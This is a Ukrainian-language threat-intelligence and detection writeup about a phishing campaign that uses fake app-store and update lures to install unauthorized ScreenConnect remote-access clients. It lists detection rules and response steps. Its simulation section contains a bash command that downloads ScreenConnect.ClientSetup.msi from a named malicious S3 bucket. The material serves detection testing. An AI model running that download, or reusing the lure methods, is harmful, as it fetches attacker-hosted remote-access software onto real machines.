Масштабне поширення ScreenConnect через фішинг із темою App Store
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Широкомасштабна фішингова кампанія використовує передові методи соціальної інженерії для розгортання несанкціонованих клієнтів ConnectWise ScreenConnect. Атакуючі видають себе за довірені сервіси, такі як магазин Microsoft Store, Apple App Store та Google Meet, за допомогою динамічного веб-контенту та фальшивих оновлень. Після встановлення ПЗ віддаленого управління забезпечує загрозливим акторам постійний віддалений доступ до скомпрометованих систем.
Розслідування
Команда LevelBlue OpsCTI виявила цю кампанію шляхом аналізу фальшивої фішингової платформи оновлень та повторно використаної інфраструктури. Дослідники ідентифікували послідовні структури директорій, повторювані хеші HTTP ресурсів та скрипти на базі ІІ для профілювання потенційних жертв. Розслідування також виявило зловживання API бота Telegram для телеметрії в реальному часі та звітування про інфікування.
Захист
Організації повинні пріоритетом виявляти несанкціоноване ПЗ віддаленого управління та контролювати виконувані завантаження з невідомих загальнодоступних хмарних сервісів, таких як Amazon S3 або Cloudflare R2. Також рекомендується керування для ідентифікації брендів, що видаються, та несанкціонованого трафіку API Telegram Bot. Регулярні ревізії запасів кінцевих точок можуть допомогти виявити самовільні установки ScreenConnect та існуючий компроміс.
Відповідь
Якщо підозрюється компроміс, уражені системи слід негайно ізолювати, а будь-які клієнти ScreenConnect, що спілкуються з несанкціонованими вузликами, слід розслідувати. Журнали мережі повинні бути переглянуті на предмет підозрілих з’єднань з відомими фішинговими доменами або кінцевими точками зберігання у хмарі. Відповідачі також повинні дослідити процеси, які запускаються msiexec.exe або PowerShell, що завантажують файли з зовнішніх джерел.
Потік атаки
Виявлення
Можливість виконання через приховані командні рядки PowerShell (через cmdline)
Proof of Value
Виклик підозрілих методів .NET з Powershell (через powershell)
Proof of Value
Можливе виконання файлів Msiexec у незвичайній директорії (через cmdline)
Proof of Value
Альтернативне ПЗ віддаленого доступу / управління (через process_creation)
Proof of Value
Можливе зловживання доменом розробки Cloudflare (через dns)
Proof of Value
Підозріла команда та управління через незвичайний домен верхнього рівня (TLD) запиту DNS (через dns)
Proof of Value
IOCs (HashSha256) для виявлення: Поза ‘Фальшивими Оновленнями’: Від фішингу у стилі магазинів додатків до масштабного розповсюдження ScreenConnect
Proof of Value
IOCs (SourceIP) для виявлення: Поза ‘Фальшивими Оновленнями’: Від фішингу у стилі магазинів додатків до масштабного розповсюдження ScreenConnect
Proof of Value
IOCs (DestinationIP) для виявлення: Поза ‘Фальшивими Оновленнями’: Від фішингу у стилі магазинів додатків до масштабного розповсюдження ScreenConnect
Proof of Value
Виконання несанкціонованої інсталяції ScreenConnect через фішинг [Створення процесу Windows]
Proof of Value
Виявлення завантаження інсталятора ScreenConnect із підозрілих S3-кошиків [AWS Cloudtrail]
Proof of Value
Виконання симуляції
Необхідна умова: Телекерування та передперевірка базових ліній повинні пройти.
Причина: Цей розділ деталізує точне виконання техніки противника (TTP), призначене для запуску правил виявлення. Команди та наратив МАЮТЬ безпосередньо відображати виявлені TTP та прямують для генерації точної телеметрії, що очікується за логікою виявлення. Абстрактні або нерелевантні приклади приведуть до помилкової діагностики.
-
Наратив атаки та команди: Атакуючий здійснив фішингову кампанію. Щоб уникнути виявлення антивірусами на основі файлів, вони розміщають легітимне ПЗ з віддаленим доступом (ScreenConnect) в публічному кошику AWS S3, що імітує легітимне розповсюдження програмного забезпечення. Атакуючий інструктує жертву завантажити інсталятор. Ця дія запускає
GetObjectподію в AWS CloudTrail, націлену на специфічний зловмисний кошикeobtdk.s3.us-east-2.amazonaws.comта специфічне ім’я файлуScreenConnect.ClientSetup.msi. -
Сценарій регресійного тесту: [Note: Since we cannot interact with real malicious buckets, this script simulates the запит який створить запис журналу, якщо кошик існував би.
#!/bin/bash # Сценарій симуляції для запуску правила виявлення CloudTrail # Це імітує API виклик, який зробив би противник для завантаження інструмента echo "[+] Початок симуляції: Завантаження ScreenConnect з зловмисного S3..." # Ми використовуємо AWS CLI для спроби Get запиту. # Навіть якщо кошик не існує, спроба 'запиту' створює подію CloudTrail # в реальному середовищі, де кошик налаштований. aws s3 cp s3://eobtdk/ScreenConnect.ClientSetup.msi . --region us-east-2 echo "[+] Команда симуляції відправлена. Перевірте CloudTrail на події GetObject, націлені на 'eobtdk.s3.us-east-2.amazonaws.com'." -
Команди очищення:
# Видалити будь-які файли, завантажені під час симуляції rm -f ScreenConnect.ClientSetup.msi